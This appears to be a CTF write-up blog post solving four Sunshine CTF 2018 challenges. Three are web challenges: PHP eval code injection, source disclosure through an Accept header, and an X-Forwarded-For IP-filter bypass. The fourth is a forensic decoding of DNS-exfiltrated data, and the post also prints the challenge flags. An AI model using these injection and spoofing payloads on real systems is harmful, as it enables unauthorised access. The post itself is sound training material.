---
layout: post
title: "Sunshine CTF 2018 - Write-ups"
lang: en
categories:
  - writeups
tags:
  - security
  - writeups
  - ctf
  - web
  - forensics
date: 2018/04/08
thumbnail: /images/ctf.png
authorId: noraj
---
## Information

### Version

| By    | Version | Comment
| ---   | ---     | ---
| noraj | 1.0     | Creation

### CTF

- **Name** : Sunshine CTF 2018
- **Website** : [sunshinectf.org](https://sunshinectf.org/)
- **Type** : Online
- **Format** : Jeopardy
- **CTF Time** : [link](https://ctftime.org/event/593/)

## 50 - Evaluation - Web

> Evaluate your life.
> How are you doing, and are you doing the best you can possibly do?
>
> Look deeper within yourself, beyond the obvious.
>
> Look at the source of it all.
>
> Also, here's a PHP challenge.
>
> http://evaluation.web1.sunshinectf.org
>
> Author: hackucf_levi

```php
 <?php 

include "flag.php";
error_reporting(0);
show_source(__FILE__);
$a = @$_REQUEST['hello'];
eval("var_dump($a);");

?>
```

All arguments we are giving are evaluated.

So let's try a request like `http://evaluation.web1.sunshinectf.org/?hello=get_defined_vars()`.

![](https://i.imgur.com/0PlUDlT.png)

But the `flag` variable equals `Nope`.

So let's try another payload: `file_get_contents('./flag.php')`:

```php
string(61) "<?php 
$flag ="Nope";

// sun{c0mm4nD_1Nj3cti0n_i5_E4sY};

?>"
```

# 100 - Marceau - Web

> Hey my friend tells me that the flag is in this site's source code. Idk how to read that though, lol (🅱️retty lame tbh 😂)
>
> http://marceau.web1.sunshinectf.org
>
> Author: charlton
>
> Hint 2018-04-06 00:20 UTC: There are many different types of MIMEs, but only a handful were truly legendary...

It's pretty easy with the hint. Just use a proxy like Burp and change this HTTP header:

```
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
```

into:

```
Accept: text/php
```

And you'll get the source:

```php
<?php
// sun{45k_4nd_y3_5h411_r3c31v3} (nice work!)

// */* won't work here- you'll have to be more assertive.
if(strpos($_SERVER['HTTP_ACCEPT'], "text/php") === false)
  echo "<marquee><h3>You specifically want my PHP source. Why did you accept anything else?</h3></marquee>";
else
  show_source(__FILE__);
?>
```

It's bad challenge design because those [valid MIME types](https://cweiske.de/tagebuch/php-mimetype.htm) won't work:

```
text/x-php
application/php
application/x-php
application/x-httpd-php
application/x-httpd-php-source
```

## 150 - Home Sweet Home - Web

> Looks like this site is doing some IP filtering.
> That's very FORWARD thinking of them.
>
> Have fun!
>
> http://web1.sunshinectf.org:50005
>
> Author: hackucf_levi
>
> Update 2018-04-06 01:55 UTC: Point value decreased from 200 -> 150.


Just add `X-Forwarded-For: 127.0.0.1` HTTP header.

Flag: `sun{Th3rEs_n0_pl4cE_l1kE_127.0.0.1}`

Note: the standardized version `Forwarded: for=127.0.0.1` doesn't work here because the challenge must be hardcoded.

More details about: [X-Forwarded-For](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-For) and [Forwarded](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Forwarded).

## 100 - Data Exfil - Forensics

> We think a critical document has been stolen out of our network, luckily our next gen IDS managed to capture the traffic during the attack. Can you tell us what they took?
>
> Author: Medic-

We can first begin with an analyse on [packettotal](https://packettotal.com/app/analysis?id=08d583409de16f60fbf53c06be1d9c86).

A bad behavior was detected.

Alert signature: `ET TROJAN Linux/Onimiki DNS trojan activity long format (Outbound)`.

This sounds like a DNS exfiltration program.

Let's use `tshark` to see what is going on:

```bash
# List all DNS queries
tshark -r pcap.pcap -T fields -e dns.qry.name -Y "dns.flags.response eq 0"
```

In the output we can see some long queries that look like `XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX.cozybear.group`, so let's filter again:

```
# List all DNS queries containing "cozybear.group"
tshark -r pcap.pcap -T fields -e dns.qry.name -Y "dns.flags.response eq 0 and dns.qry.name contains cozybear.group"

504b030414000000000030be774c973a10791e0000001e0000000a000000.cozybear.group
7365637265742e74787473756e7b7730775f495f646e735f7333335f7930.cozybear.group
755f316e5f683372337d504b0102140014000000000030be774c973a1079.cozybear.group
1e0000001e0000000a000000000000000100200000000000000073656372.cozybear.group
65742e747874504b0506000000000100010038000000460000000000.cozybear.group
504b030414000000000030be774c973a10791e0000001e0000000a000000.cozybear.group
7365637265742e74787473756e7b7730775f495f646e735f7333335f7930.cozybear.group
755f316e5f683372337d504b0102140014000000000030be774c973a1079.cozybear.group
1e0000001e0000000a000000000000000100200000000000000073656372.cozybear.group
65742e747874504b0506000000000100010038000000460000000000.cozybear.group
504b030414000000000030be774c973a10791e0000001e0000000a000000.cozybear.group
7365637265742e74787473756e7b7730775f495f646e735f7333335f7930.cozybear.group
755f316e5f683372337d504b0102140014000000000030be774c973a1079.cozybear.group
1e0000001e0000000a000000000000000100200000000000000073656372.cozybear.group
65742e747874504b0506000000000100010038000000460000000000.cozybear.group
504b030414000000000030be774c973a10791e0000001e0000000a000000.cozybear.group
7365637265742e74787473756e7b7730775f495f646e735f7333335f7930.cozybear.group
755f316e5f683372337d504b0102140014000000000030be774c973a1079.cozybear.group
1e0000001e0000000a000000000000000100200000000000000073656372.cozybear.group
65742e747874504b0506000000000100010038000000460000000000.cozybear.group
504b030414000000000030be774c973a10791e0000001e0000000a000000.cozybear.group
7365637265742e74787473756e7b7730775f495f646e735f7333335f7930.cozybear.group
755f316e5f683372337d504b0102140014000000000030be774c973a1079.cozybear.group
1e0000001e0000000a000000000000000100200000000000000073656372.cozybear.group
65742e747874504b0506000000000100010038000000460000000000.cozybear.group
504b030414000000000030be774c973a10791e0000001e0000000a000000.cozybear.group
7365637265742e74787473756e7b7730775f495f646e735f7333335f7930.cozybear.group
755f316e5f683372337d504b0102140014000000000030be774c973a1079.cozybear.group
1e0000001e0000000a000000000000000100200000000000000073656372.cozybear.group
65742e747874504b0506000000000100010038000000460000000000.cozybear.group
504b030414000000000030be774c973a10791e0000001e0000000a000000.cozybear.group
7365637265742e74787473756e7b7730775f495f646e735f7333335f7930.cozybear.group
755f316e5f683372337d504b0102140014000000000030be774c973a1079.cozybear.group
1e0000001e0000000a000000000000000100200000000000000073656372.cozybear.group
65742e747874504b0506000000000100010038000000460000000000.cozybear.group
```

So we have hexadecimal encoded payloads. I just wrote a very short ruby script to decode them:

```ruby
#!/usr/bin/env ruby

File.readlines('query.txt').each do |line|
  data = line.match(/([0-9a-f]{56,60})\.cozybear\.group/).captures[0]
  puts [data].pack('H*')
end
```

Let's save the output and check what is inside:

```
$ ruby unpack.rb > files

$ binwalk files 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
130           0x82            End of Zip archive
283           0x11B           End of Zip archive
436           0x1B4           End of Zip archive
589           0x24D           End of Zip archive
742           0x2E6           End of Zip archive
895           0x37F           End of Zip archive
1048          0x418           End of Zip archive

$ strings files
secret.txtsun{w0w_I_dns_s33_y0
u_1n_h3r3}PK
secr
et.txtPK
secret.txtsun{w0w_I_dns_s33_y0
u_1n_h3r3}PK
secr
et.txtPK
secret.txtsun{w0w_I_dns_s33_y0
u_1n_h3r3}PK
secr
et.txtPK
secret.txtsun{w0w_I_dns_s33_y0
u_1n_h3r3}PK
secr
et.txtPK
secret.txtsun{w0w_I_dns_s33_y0
u_1n_h3r3}PK
secr
et.txtPK
secret.txtsun{w0w_I_dns_s33_y0
u_1n_h3r3}PK
secr
et.txtPK
secret.txtsun{w0w_I_dns_s33_y0
u_1n_h3r3}PK
secr
et.txtPK
```

The same zip was exfiltrated several times.

Flag: `sun{w0w_I_dns_s33_y0u_1n_h3r3}`.
